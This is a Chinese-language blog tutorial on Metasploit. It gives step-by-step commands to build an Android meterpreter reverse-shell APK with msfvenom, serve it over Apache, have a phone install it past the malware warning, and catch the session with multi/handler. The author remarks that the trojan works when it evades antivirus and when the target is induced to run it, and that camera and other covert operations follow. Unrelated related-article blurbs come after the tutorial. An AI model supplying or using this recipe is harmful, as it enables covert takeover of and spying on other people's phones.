kali_msf6_渗透

简介: kali_msf6_渗透

工具简介:

msf全称Metasploit是H.D. Moore在2003年开发的,它是少数几个可用于执行诸多渗透测试步骤的工具。在发现新漏洞时(这是很常见的),Metasploit会监控Rapid7,然后Metasploit的200,000多个用户会将漏洞添加到Metasploit的目录上。然后,任何人只要使用Metasploit,就可以用它来测试特定系统的是否有这个漏洞。


通俗来说msf就是一个渗透的工具包,初学者可以从kali开始了解,因为kali的工具含量对于初学者来讲,还是比较广的,给我们去了解渗透工作,足够。


作者环境:

kali2020:版本没啥说的,至少用跟你现在电脑兼容的吧,下载链接已奉上


image.png


Get Kali | Kali Linux

局域网:kali的网卡与主机网卡要共享,并且主机与目标机在同一个局域网内

下面开始操作:

生成监听木马

image.png

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=5000 R > test.apk
             #       msf的模块                    kali的ip       kali的端口      生成文件

注意我们代码此时的路径在/home/lqx/桌面,这样我们生成的文件可以在桌面直接看到

将木马下载到手机

通过kali的apache服务将文件上传至服务器,而手机则通过kali的ip地址登陆服务器并下载木马。

image.png

/etc/init.d/apache2 start #开启apache服务

将刚刚生成的文件移动到/etc/www/html目录下,并删除此路径下的index.html文件

image.png

mv test.apk /var/www/html
#将test.apk文件移动到/var/www/html路径下
cd /var/www/html
#切换窗口的操作路径
rm index.html
#删除index.html文件

我们在浏览器输入kali的ip地址并下载测试用的木马文件

image.png

image.png

因为没有做防杀,所以立刻就被系统检测,不用担心我们“继续安装”。

image.png

安装完成后,我们直接运行它。因为生成的是纯木马文件没有任何伪装,运行了也不会有‘任何效果’

开启msf

image.png


image.png

msfconsole  #开启msf

配置参数

image.png

成功建立会话后进入meterpreter

use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.5.100    #kali的ip
set LPORT 5000           #kali的端口
#与前面配置木马时的host、port参数一致
run
#开始监听

测试渗透结果:

其实到这里我们就已经成功了,接下里我们可以在kali上对手机进行,拍照,查看app,等不可描述的操作,究其原理就是木马够接地气不被杀毒软件检测,其次诱导目标运行。

app_list #查看手机安装的app

image.png

相关文章
|
druid Java 数据库
druid+springboot加解密Druid链接池配置加密密码链接数据库
druid+springboot加解密Druid链接池配置加密密码链接数据库
1312 0
|
前端开发
element ui el-table 多选 表头全选框替换文字
element ui el-table 多选 表头全选框替换文字
1963 0
|
6月前
|
设计模式 网络协议 Java
【设计模式】【行为型模式】状态模式(State)
一、入门 什么是状态模式? 状态模式(State Pattern)是一种行为设计模式,允许对象在其内部状态改变时改变其行为,使其看起来像是改变了类。状态模式的核心思想是将对象的状态封装成独立的类,并将
290 16
|
3月前
|
人工智能 缓存 监控
大模型性能测试实战指南:从原理到落地的全链路解析
本文系统解析大模型性能测试的核心方法,涵盖流式响应原理、五大关键指标(首Token延迟、吐字率等)及测试策略,提供基于Locust的压测实战方案,并深入性能瓶颈分析与优化技巧。针对多模态新挑战,探讨混合输入测试与资源优化
|
机器学习/深度学习 测试技术
大模型开发:描述交叉验证以及为什么在模型评估中使用它。
交叉验证是评估机器学习模型性能的方法,通过将数据集分成训练集和多份子集(折叠)进行多次训练验证。每次选择一份子集作为验证集,其余作训练,最后平均评估结果。这样能减少过拟合,提供可靠性能估计,用于参数调优,并减少小数据集或噪声带来的随机性影响。它是模型评估的关键技术,确保更准确的性能估计。
480 1
|
安全 网络安全 数据库
CISP-PTE靶机
本文档详细记录了一次针对Windows 2003服务器的渗透测试过程。测试环境包括攻击机(Kali Linux,IP: 192.168.18.130)和靶机(Windows 2003,IP: 192.168.18.145),两者需处于同一局域网内。测试过程中,通过Nmap扫描发现靶机开放了SQL Server端口,进一步利用信息泄露、文件上传漏洞及数据库连接等方式,逐步获取了系统的控制权限,最终实现了远程桌面连接。文中还提供了多种技术细节和操作命令,帮助读者理解每一步的具体实现方法。
378 0
CISP-PTE靶机
|
移动开发
移动端(h5)自动填充短信验证码
移动端(h5)自动填充短信验证码
|
流计算
基于双闭环PI和SVPWM的PMSM控制器simulink建模与仿真
该文主要介绍了一个基于双闭环PI和SVPWM技术的PMSM控制器的Simulink建模与仿真项目。系统包含逆变桥、PMSM电机、变换器、SVPWM、PI控制器等模块,实现了转速和电流的快速稳定控制。文章提供了系统仿真的图表,并详细阐述了双闭环PI控制器设计及SVPWM技术。在控制流程中,系统不断采集反馈信息,通过PI控制器调整直轴和交轴电流,经SVPWM调制后驱动电机运行,确保高效精确的电机控制。使用的工具为MATLAB2022a。
|
消息中间件 分布式计算 Java
|
弹性计算 缓存 测试技术
云服务器2核4G能支持多少人同时访问?2核4G5M并发量评测!
阿里云2核4g服务器能支持多少人访问?2核4G服务器并发数性能测试,阿小云账号下的2核4G服务器支持20人同时在线访问,然而应用不同、类型不同、程序效率不同实际并发数也不同,2核4G服务器的在线访问人数取决于多个变量